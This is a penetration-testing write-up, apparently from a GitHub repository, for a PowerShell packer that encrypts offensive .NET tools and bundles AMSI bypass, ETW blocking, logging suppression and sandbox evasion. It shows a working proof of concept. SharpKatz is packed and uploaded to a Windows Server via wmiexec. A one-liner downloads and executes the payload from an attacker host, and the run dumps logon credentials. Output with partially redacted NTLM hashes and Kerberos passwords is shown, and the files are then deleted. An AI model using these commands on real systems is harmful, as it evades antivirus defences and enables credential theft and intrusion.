================================================================================================================================================
AV bypass using my PowerShell packer 'Invoke-Csharp-Packer'
================================================================================================================================================

'Invoke-Csharp-Packer' allows to pack and encrypt offensive (C#) .NET executable files in order to bypass AV solutions such as Windows Defender. 
It generates an obfuscated and encrypted PowerShell script that contains the (C#) .NET executable file.

=> URL: https://github.com/Jean-Francois-C/Windows-Penetration-Testing/tree/master/Defense%20evasion%20(examples)/Invoke-Csharp-Packer

FEATURES
---------
> AES encryption and GZip/Deflate compression (based on 'Xencrypt')
> AMSI bypass
> Blocking Event Tracing for Windows (ETW)
> Disabling PowerShell history logging
> Basic sandbox evasion techniques (optional)
  + stop/exit if the PowerShell session is being debugged (detection based on "Test-Path Variable:PSDebugContext")
  + wait for 60 seconds before execution


======================================================================================================================================================
PoC 1 - Create & then run a packed/encrypted version of the tool 'Sharpkatz.exe' on a Windows server 2016 without getting detected by Windows Defender
======================================================================================================================================================

Step 1 - Create a packed/encrypted version of the tool 'Sharpkatz.exe' using 'Invoke-Csharp-Packer.ps1'
-------------------------------------------------------------------------------------------------------

C:\temp>powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\temp> iex (New-Object Net.WebClient).DownloadString('https://github.com/Jean-Francois-C/Windows-Penetration-Testing/raw/master/Defense%20evasion%20(examples)/Invoke-Csharp-Packer/Invoke-Csharp-Packer.ps1');

   ___    _                     ___         _
  / __|__| |_  ___ _ _ _ __ ___| _ \___  __| |_____ _ _
 | (__(_-< ' \/ _ | '_| '_ \___|  _/ _ |/ _| / / -_) '_|
  \___/__/_||_\__,|_| | .__/   |_| \__,_\__|_\_\___|_|
                      |_|                               v1.0

Usage:
> Invoke-Csharp-Packer -FileUrl https://URL/Csharp-binary.exe -OutFile C:\path\Packed-Csharp-binary.ps1
> Invoke-Csharp-Packer -FilePath C:\path\Csharp-binary.exe -OutFile C:\path\Packed-Csharp-binary.ps1

Features:
[*] AES encryption and GZip/Deflate compression (based on 'Xencrypt')
[*] AMSI bypass
[*] Blocking Event Tracing for Windows (ETW)
[*] Disabling PowerShell history logging
[*] Basic sandbox evasion techniques (optional -sandbox)


PS C:\temp> Invoke-Csharp-Packer -FileUrl https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe -OutFile C:\temp\packed-sharpkatz.ps1
[*] Downloading the remote .NET executable file: 'https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe'
[*] Creating the .NET executable loader script
[*] File compression (GZip/Deflate)
[*] File encryption (AES)
[*] Adding 'A'M'S'I' bypass
[*] Adding 'E'T'W' bypass
[*] Disabling PoSh history logging
[*] The obfuscated & encrypted .NET executable loader script has been saved: 'C:\temp\packed-sharpkatz.ps1' ...
[+] Done!
PS C:\temp>


Step 2 - Upload & execute into memory the packed/encrypted script 'packed-sharpkatz.ps1' without being detected by the Windows Defender AV
---------------------------------------------------------------------------------------------------------------------------------------------

PS C:\Users\Administrator> systeminfo

Host Name:                 WEBSERVER2
OS Name:                   Microsoft Windows Server 2016 Datacenter
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
<SNIP>


PS C:\Users\Administrator> Get-MpComputerStatus | Select AntivirusEnabled,RealTimeProtectionEnabled,IoavProtectionEnabled,AntispywareEnabled,AntivirusSignatureLastUpdated | FL

AntivirusEnabled              : True
RealTimeProtectionEnabled     : True
IoavProtectionEnabled         : True
AntispywareEnabled            : True
AntivirusSignatureLastUpdated : 02/02/2023 04:49:12


C:\Users\Administrator\Documents\Tools-Pentest\4-Impacket_windows>wmiexec_windows.exe administrator@192.168.1.76
Cannot determine Impacket version. If running from source you should at least run "python setup.py egg_info"
Impacket v? - Copyright 2020 SecureAuth Corporation

Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
C:\>hostname
Webserver2

C:\>cd temp

C:\temp>put katz.ps1
[*] Uploading katz.ps1 to C:\temp\katz.ps1

C:\temp>type katz.ps1
IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.113:8081/temp/packed-sharpkatz.ps1');
Invoke-Packed-NET-Executable "--Command","logonpasswords" > C:\temp\test.txt

C:\temp>powershell -c iex ./katz.ps1

C:\temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 6832-DE11

 Directory of C:\temp
03/02/2023  12:50    <DIR>          .
03/02/2023  12:50    <DIR>          ..
03/02/2023  12:49               179 katz.ps1
03/02/2023  12:50             8 590 test.txt
               2 File(s)          8 769 bytes
               2 Dir(s)  32 673 955 840 bytes free
 
C:\temp>get test.txt
[*] Downloading C:\\temp\test.txt

C:\temp>del test.txt
C:\temp>del katz.ps1

C:\temp>exit

C:\Users\Administrator.PO718687\Documents\Tools-Pentest\4-Impacket_windows>type test.txt

[*] Attempting to load the C# assembly with argument(s): --Command logonpasswords
[*]
[*]                     System Information
[*] ----------------------------------------------------------------------
[*] | Platform: Win32NT                                                  |
[*] ----------------------------------------------------------------------
[*] | Major: 10            | Minor: 0             | Build: 14393         |
[*] ----------------------------------------------------------------------
[*] | Version: Microsoft Windows NT 10.0.14393.0                         |
[*] ----------------------------------------------------------------------
[*]
[*] Authentication Id   : 0;225255 (00000000:00225255)
[*] Session             : Network from 0
[*] UserName            : Administrator
[*] LogonDomain         : WEBSERVER2
[*] LogonServer         : WEBSERVER2
[*] LogonTime           : 2023/02/03 12:46:59
[*] SID                 : S-1-5-21-2855040287-2641962212-1900751911-500
[*]
[*]      Kerberos
[*]       Domain   : WEBSERVER2
[*]       Username : Administrator
[*]       Password : [NULL]
[*]
[*] Authentication Id   : 0;53684 (00000000:00053684)
[*] Session             : Interactive from 1
[*] UserName            : DWM-1
[*] LogonDomain         : Window Manager
[*] LogonServer         :
[*] LogonTime           : 2023/02/03 12:46:05
[*] SID                 : S-1-5-90-0-1
[*]
[*]      Msv
[*]       Domain   : COMPANY
[*]       Username : WEBSERVER2$
[*]       LM       : 00000000000000000000000000000000
[*]       NTLM     : b71e7e77879711011bc5c39b2<SNIP>
[*]       SHA1     : 3e142f00c4a695910fed0bac79<SNIP>
[*]       DPAPI    : 00000000000000000000000000000000
[*]
[*]      WDigest
[*]       Hostname : COMPANY
[*]       Username : WEBSERVER2$
[*]       Password : [NULL]
[*]
[*]      Kerberos
[*]       Domain   : company.work
[*]       Username : WEBSERVER2$
[*]       Password : E)`Yc43f/dw(VcZrm/Uc&+*ujA?lCgl,DfzQ7c?FZhak"T<SNIP>
[*]
<SNIP>
